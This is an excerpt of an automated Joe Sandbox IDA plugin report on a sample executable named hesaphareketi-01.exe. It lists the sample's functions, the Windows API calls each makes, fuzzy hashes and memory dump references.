                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                                                      • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                                                      • Opcode Fuzzy Hash: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                                                      • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(0001047A,?), ref: 00401587
                                                                                      • ShowWindow.USER32(00010474), ref: 0040159C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: 127fcca6f89a8604d6b4e5a3b07e2e150d46683bc6f97280cfd7514b8c0c2a53
                                                                                      • Instruction ID: 07726e94f459f5b79439a183944d215d14e5e7c392dcdebcc51584dee33f67e3
                                                                                      • Opcode Fuzzy Hash: 127fcca6f89a8604d6b4e5a3b07e2e150d46683bc6f97280cfd7514b8c0c2a53
                                                                                      • Instruction Fuzzy Hash: D1E086377041049FCB15DFA4ED808AE77A6EB44321318047FE502F3690C675AD40CF68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040665C Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                                        • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                                        • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                                                        • Part of subcall function 004065EC: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                                      • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                                                      • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                                      • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405D74 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\hesaphareketi-01.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                      • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                      • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                      • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405832 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                      • Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
                                                                                      • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                      • Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileMove
                                                                                      • String ID:
                                                                                      • API String ID: 3562171763-0
                                                                                      • Opcode ID: 00950383e2418b758ba5d5ef96d8c906d56e3cb6ea615abdf22e42107666f064
                                                                                      • Instruction ID: a1293fda71315ca4f457bf12d72103a8cc789f689a624f6d3393c8ddcf995e9b
                                                                                      • Opcode Fuzzy Hash: 00950383e2418b758ba5d5ef96d8c906d56e3cb6ea615abdf22e42107666f064
                                                                                      • Instruction Fuzzy Hash: 06F0B431608114A7DB20B7B54F0DE9F61A48F92378F25073FB011B21D1EABC8911956F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                      • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                                      • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                      • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040611D Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                      • Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
                                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                      • Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: PathSearch
                                                                                      • String ID:
                                                                                      • API String ID: 2203818243-0
                                                                                      • Opcode ID: 87fe3b61629f5e0ebd9fc8bdc6ab881a16aedefde4f24a351ebdfdeb992b7138
                                                                                      • Instruction ID: c536573bc3e43d5b3a7e85c7c9e9d28b189a23ca24d66c16325d62ee7f8c4f5c
                                                                                      • Opcode Fuzzy Hash: 87fe3b61629f5e0ebd9fc8bdc6ab881a16aedefde4f24a351ebdfdeb992b7138
                                                                                      • Instruction Fuzzy Hash: 42E04FB2704204AAE710DBA4DE49AAA77A8DF40368B20853AB211E61C1E6B49941976D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405E26 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                      • Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
                                                                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                      • Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405DF7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                      • Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
                                                                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                      • Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                      • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                      • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402348 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString
                                                                                      • String ID:
                                                                                      • API String ID: 1096422788-0
                                                                                      • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                                      • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                                                      • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                                      • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004060EF Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617D,?,00000000,?,?,Call,?), ref: 00406113
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
